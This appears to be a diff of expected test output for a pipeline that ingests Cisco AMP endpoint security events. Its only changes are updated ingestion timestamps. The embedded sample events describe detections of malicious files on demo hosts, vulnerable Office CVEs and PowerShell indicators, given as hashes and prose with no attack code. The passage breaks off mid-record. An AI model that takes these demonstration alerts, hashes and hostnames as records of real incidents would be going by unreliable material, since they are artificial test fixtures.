"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", @@ -1855,7 +1855,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222516300Z", + "ingested": "2021-12-14T14:40:34.011393474Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1936,7 +1936,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222522400Z", + "ingested": "2021-12-14T14:40:34.011394003Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "code": "1107296278", "kind": "alert", @@ -2018,7 +2018,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222528100Z", + "ingested": "2021-12-14T14:40:34.011394427Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648173", "kind": "alert", @@ -2082,7 +2082,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222533800Z", + "ingested": "2021-12-14T14:40:34.011394840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -2146,7 +2146,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222539400Z", + "ingested": "2021-12-14T14:40:34.011395242Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "2164260893", "kind": "alert", @@ -2222,7 +2222,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222545Z", + "ingested": "2021-12-14T14:40:34.011395748Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648155", "kind": "alert", @@ -2300,7 +2300,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222550700Z", + "ingested": "2021-12-14T14:40:34.011396286Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", @@ -2384,7 +2384,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222556400Z", + "ingested": "2021-12-14T14:40:34.011396749Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "code": "553648147", "kind": "alert", @@ -2464,7 +2464,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222562Z", + "ingested": "2021-12-14T14:40:34.011397171Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "code": "1107296279", "kind": "alert", @@ -2628,7 +2628,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222567700Z", + "ingested": "2021-12-14T14:40:34.011397613Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -2699,7 +2699,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222573400Z", + "ingested": "2021-12-14T14:40:34.011398138Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", @@ -2786,7 +2786,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222579300Z", + "ingested": "2021-12-14T14:40:34.011398600Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "code": "1107296274", "kind": "alert", @@ -2866,7 +2866,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222585300Z", + "ingested": "2021-12-14T14:40:34.011399186Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "code": "553648143", "kind": "alert", @@ -2945,7 +2945,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222591200Z", + "ingested": "2021-12-14T14:40:34.011399604Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3017,7 +3017,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222596900Z", + "ingested": "2021-12-14T14:40:34.011400021Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy 